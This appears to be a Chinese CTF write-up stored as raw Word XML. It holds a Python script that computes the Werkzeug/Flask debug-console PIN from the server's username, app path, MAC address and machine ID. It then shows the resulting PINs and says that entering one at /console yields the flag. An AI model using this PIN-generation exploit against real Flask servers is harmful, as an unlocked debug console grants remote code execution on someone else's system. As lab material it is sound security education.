    <w:p w14:paraId="68AA365B" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    h.update(b'cookiesalt')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F4204A" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0487B1EB" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    num = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C14196" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if num is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FE00B1" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        h.update(b'pinsalt')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6D6109" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        num = ('%09d' % int(h.hexdigest(), 16))[:9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22309533" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD893FA" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    rv = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB1BE7A" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if rv is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE5344C" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for group_size in 5, 4, 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1014299E" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if len(num) % group_size == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708D5C5A" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1CCD3F" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                              for x in range(0, len(num), group_size))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFAE119" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9A559F" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D390ED" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            rv = num</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6B979B" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CA40867" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return rv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE30AE6" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2025C4DE" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t>def getSha1Pin(probably_public_bits, private_bits):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FE2BAC" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    h = hashlib.sha1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DE5A13" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for bit in chain(probably_public_bits, private_bits):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753256A7" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if not bit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27333703" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D228C2" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if isinstance(bit, str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03727CF0" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            bit = bit.encode("utf-8")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2FAA60" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        h.update(bit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A7FEA3" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    h.update(b"cookiesalt")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E0A448" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="490B3BBE" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    num = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFFBCD7" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if num is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FC759F" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        h.update(b"pinsalt")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473935B8" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        num = f"{int(h.hexdigest(), 16):09d}"[:9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CEAF54" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C292167" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    rv = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F337DF" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if rv is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB33C7A" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for group_size in 5, 4, 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702405AF" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if len(num) % group_size == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FB03F6" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                rv = "-".join(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D3B1BC" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    num[x: x + group_size].rjust(group_size, "0")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C564A11" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    for x in range(0, len(num), group_size)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75646708" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D19D96" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F974AC0" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1B779F" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            rv = num</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC900BA" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C2DC3FA" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return rv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C41095" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76BCF7E5" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t>def macToInt(mac):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7F0F3E" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    mac = mac.replace(":", "")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07788B87" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return str(int(mac, 16))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368D70E4" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B30B32B" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46565861" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    parse = argparse.ArgumentParser(description = "Calculate Python Flask Pin")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79896078" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    parse.add_argument('-u', '--username',required = True, type = str, help = "运行flask用户的用户名")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2646D6A1" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    parse.add_argument('-m', '--modname', type = str, default = "flask.app", help = "默认为flask.app")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A49BDC" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    parse.add_argument('-a', '--appname', type = str, default = "Flask", help = "默认为Flask")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FBF154" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    parse.add_argument('-p', '--path', required = True, type = str, help = "getattr(mod, '__file__', None):flask包中app.py的路径")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23661C61" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    parse.add_argument('-M', '--MAC', required = True, type = str, help = "MAC地址")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5B6844" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    parse.add_argument('-i', '--machineId', type = str, default = "", help = "机器ID")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BBC6EE" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    args = parse.parse_args()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECB6437" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BD05DF6" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    probably_public_bits = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B160E2" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        args.username,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DEB8FB" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        args.modname,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596B7130" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        args.appname,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E22FF5" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        args.path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45568499" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2329BD12" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13472D10" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    private_bits = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C988A44" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        macToInt(args.MAC),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FD292B" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        bytes(args.machineId, encoding = 'utf-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752147FC" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D38802" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    md5Pin = getMd5Pin(probably_public_bits, private_bits)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06157924" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    sha1Pin = getSha1Pin(probably_public_bits, private_bits)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D50757" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07873CFF" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("Md5Pin:  " + md5Pin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3BB271" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("Sha1Pin:  " + sha1Pin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288FC2F2" w14:textId="77777777" w:rsidR="004B339D" w:rsidRPr="004B339D" w:rsidRDefault="004B339D" w:rsidP="001B3B3B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7102D5B2" w14:textId="40FF516C" w:rsidR="001B3B3B" w:rsidRDefault="001B3B3B" w:rsidP="001B3B3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由此得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pin：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CD0016" w14:textId="77777777" w:rsidR="001B3B3B" w:rsidRPr="00804955" w:rsidRDefault="001B3B3B" w:rsidP="001B3B3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04955">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Md5Pin:  208-479-340</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1788FE1F" w14:textId="77777777" w:rsidR="001B3B3B" w:rsidRDefault="001B3B3B" w:rsidP="001B3B3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 w:rsidRPr="00804955">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sha1Pin:  252-749-991</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378F2719" w14:textId="285D8CD2" w:rsidR="001B3B3B" w:rsidRPr="00AE199C" w:rsidRDefault="001B3B3B" w:rsidP="001B3B3B">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="240" w:lineRule="auto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访问/console路由输入</w:t>
      </w:r>
      <w:r w:rsidR="009D4951">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>得到的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pin得到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E95F8A" w14:textId="77777777" w:rsidR="001B3B3B" w:rsidRPr="00EA3779" w:rsidRDefault="001B3B3B" w:rsidP="001B3B3B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="001B3B3B" w:rsidRPr="00EA37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F1136D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1FE015EA"/>
    <w:lvl w:ilvl="0" w:tplc="37401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3736419">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="12472252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160DB"/>
    <w:rsid w:val="001043FF"/>
    <w:rsid w:val="001A6A59"/>
    <w:rsid w:val="001B3B3B"/>
    <w:rsid w:val="001F7B74"/>
    <w:rsid w:val="003D0756"/>
    <w:rsid w:val="003F4582"/>
    <w:rsid w:val="00463C49"/>
    <w:rsid w:val="00484B66"/>
    <w:rsid w:val="004A3D27"/>
    <w:rsid w:val="004B339D"/>
    <w:rsid w:val="005157AC"/>
    <w:rsid w:val="00555ADA"/>
    <w:rsid w:val="0061096D"/>
    <w:rsid w:val="006833D9"/>
    <w:rsid w:val="006D7CD7"/>
    <w:rsid w:val="008E1CD6"/>
    <w:rsid w:val="009B08C3"/>
    <w:rsid w:val="009D4951"/>
    <w:rsid w:val="00A357C2"/>
    <w:rsid w:val="00AC4F99"/>
    <w:rsid w:val="00AF064E"/>
    <w:rsid w:val="00AF5A79"/>
    <w:rsid w:val="00C346CE"/>
    <w:rsid w:val="00CA0E42"/>
    <w:rsid w:val="00D10234"/>
    <w:rsid w:val="00DD1624"/>
    <w:rsid w:val="00E50877"/>
    <w:rsid w:val="00E575C5"/>
    <w:rsid w:val="00EA3779"/>
    <w:rsid w:val="00FB1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character" w:styleId="a4">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001B3B3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B3B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3B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4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101.200.138.180:10006/vipprice?token=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8</Pages>
  <Words>746</Words>
  <Characters>4255</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>35</Lines>
  <Paragraphs>9</Paragraphs>
  <ScaleCrop>false</ScaleCrop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27</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-11T03:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-01T15:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>